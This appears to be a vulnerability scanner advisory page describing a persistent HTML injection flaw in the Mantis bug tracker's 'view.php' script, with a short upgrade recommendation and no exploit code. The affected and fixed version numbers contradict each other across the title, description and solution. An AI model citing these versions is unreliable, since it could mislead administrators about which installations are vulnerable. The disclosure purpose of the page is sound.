Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Mantis < 0.9.5 / 1.1.0 RC5 view.php HTML Injection

High

Synopsis

The remote host is vulnerable to an HTML injection attack.

Description

The remote host appears to be running a vulnerable version of Mantis, a bug tracker web application written in PHP. It is reported that versions lower than 1.1.0 are vulnerable to a persistent HTML injection attack. The root of the flaw is in the way that Mantis handles user-supplied data to the 'view.php' script. An attacker exploiting this flaw would only need the ability to send HTTP requests to the 'view.php' script. Successful exploitation would result in arbitrary code being executed within the browser of other Mantis users.

Solution

Upgrade to version 0.19.5, 1.0.0 RC5 or higher.